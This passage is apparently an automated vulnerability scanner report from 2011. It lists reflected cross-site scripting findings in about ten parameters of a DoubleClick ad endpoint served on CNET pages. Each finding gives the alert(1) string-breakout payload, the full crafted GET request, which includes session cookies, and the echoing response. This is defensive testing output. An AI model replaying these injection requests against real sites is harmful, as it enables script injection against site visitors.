<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
%3B61697327%3B3454-728/90%3B41243731/41261518/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=3068651bd1"-alert(1)-"9b019ff65a6&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.
...[SNIP]...

3.254. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4762b"-alert(1)-"efa33560dba was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a4762b"-alert(1)-"efa33560dba&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
%3Dv8/3af6/17/181/%2a/u%3B239466418%3B0-0%3B0%3B61697327%3B3454-728/90%3B41243731/41261518/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a4762b"-alert(1)-"efa33560dba&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.2
...[SNIP]...

3.255. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 774ba"-alert(1)-"1c1e8698a2b was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=774ba"-alert(1)-"1c1e8698a2b&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=774ba"-alert(1)-"1c1e8698a2b&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.hp.com/united-states/tradein/promo/laserjet3/index_ent
...[SNIP]...

3.256. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f345"-alert(1)-"b2fb05949b9 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com8f345"-alert(1)-"b2fb05949b9&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
log.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com8f345"-alert(1)-"b2fb05949b9&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.hp.com/united-states/tradein/promo/laserjet
...[SNIP]...

3.257. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27004"-alert(1)-"3fe778b37d7 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=227004"-alert(1)-"3fe778b37d7&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
6/17/181/%2a/u%3B239466418%3B0-0%3B0%3B61697327%3B3454-728/90%3B41243731/41261518/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=227004"-alert(1)-"3fe778b37d7&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg
...[SNIP]...

3.258. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90749"-alert(1)-"bd70542fbf4 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com90749"-alert(1)-"bd70542fbf4&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com90749"-alert(1)-"bd70542fbf4&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.hp.com/united-states/tradein/promo/laserjet3/index_ent.html?jumpid=ex_r2612_go/tradeinandsave
...[SNIP]...

3.259. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e268c"-alert(1)-"b3701dcf994 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIYe268c"-alert(1)-"b3701dcf994&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
01&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIYe268c"-alert(1)-"b3701dcf994&t=2011.04.27.23.14.45&event=58/http://www.hp.com/united-states/tradein/promo/laserjet3/index_ent.html?jumpid=ex_r2612_go/tradeinandsave/dm:_N5823.CNET_61697327_239466418_41243731");
var wmode = "opaqu
...[SNIP]...

3.260. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f195c"-alert(1)-"03178e8094f was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=f195c"-alert(1)-"03178e8094f&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
697327%3B3454-728/90%3B41243731/41261518/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=f195c"-alert(1)-"03178e8094f&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23
...[SNIP]...

3.261. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29d49"-alert(1)-"ca206ba6f6e was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=10029d49"-alert(1)-"ca206ba6f6e&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
%3B41243731/41261518/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=10029d49"-alert(1)-"ca206ba6f6e&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http
...[SNIP]...

3.262. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b462d"-alert(1)-"1f41ecccafb was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=b462d"-alert(1)-"1f41ecccafb&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=b462d"-alert(1)-"1f41ecccafb&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.hp.com/united-states/tradein/promo/laserjet3/index_ent.html?jumpid=ex_r261
...[SNIP]...

3.263. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec23f"-alert(1)-"794881e6562 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301ec23f"-alert(1)-"794881e6562&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
